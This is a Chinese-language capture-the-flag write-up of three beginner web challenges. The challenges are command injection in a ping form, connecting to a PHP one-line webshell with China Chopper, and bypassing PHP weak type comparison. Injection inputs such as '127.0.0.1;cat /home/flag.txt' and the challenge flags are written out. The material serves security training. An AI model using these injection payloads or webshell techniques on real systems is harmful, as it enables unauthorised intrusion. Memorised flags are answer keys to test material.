新手入門區域
1.command_execution
小寧寫了個ping功能,但沒有寫waf,X老師告訴她這是非常危險的,你知道爲什麼嗎。
wp:
輸入127.0.0.1;ls,發現可執行後面的ls,故直接用find命令查找:127.0.0.1;find / -name '*flag*'
看到/home/flag.txt ,於是輸入:127.0.0.1;cat /home/flag.txt 拿到flag:
cyberpeace{c9ed5c3cdb8d1e9c140ca4457d6e2412}
2.webshell
小寧百度了php一句話,覺着很有意思,並且把它放在index.php裏。
wp:
我的場景ip地址是http://111.198.29.45:33638
直接上中國菜刀連接http://111.198.29.45:33638/index.php,參數填shell
然後打開終端,ls--->cat flag.txt拿到flag:cyberpeace{ea8df082fd193ea320849f101f4fbf57}
3.simple_php
小寧聽說php是最好的語言,於是她簡單學習之後寫了幾行php代碼
給出了比較邏輯:
<?php
show_source(__FILE__);
include("config.php");
$a=@$_GET['a'];
$b=@$_GET['b'];
if($a==0 and $a){
echo $flag1;
}
if(is_numeric($b)){
exit();
}
if($b>1234){
echo $flag2;
}
?>
wp:
第一個參數a可以等於0也可以等於'',因爲是弱類型比較。
第二個參數b首先判斷是否是數字,那就在數字後面加字母就不是數字了。
然後只需要比1235大就行
故參數a=''&b=1236qwe
拿到flag:Cyberpeace{647E37C7627CC3E4019EC69324F66C7C}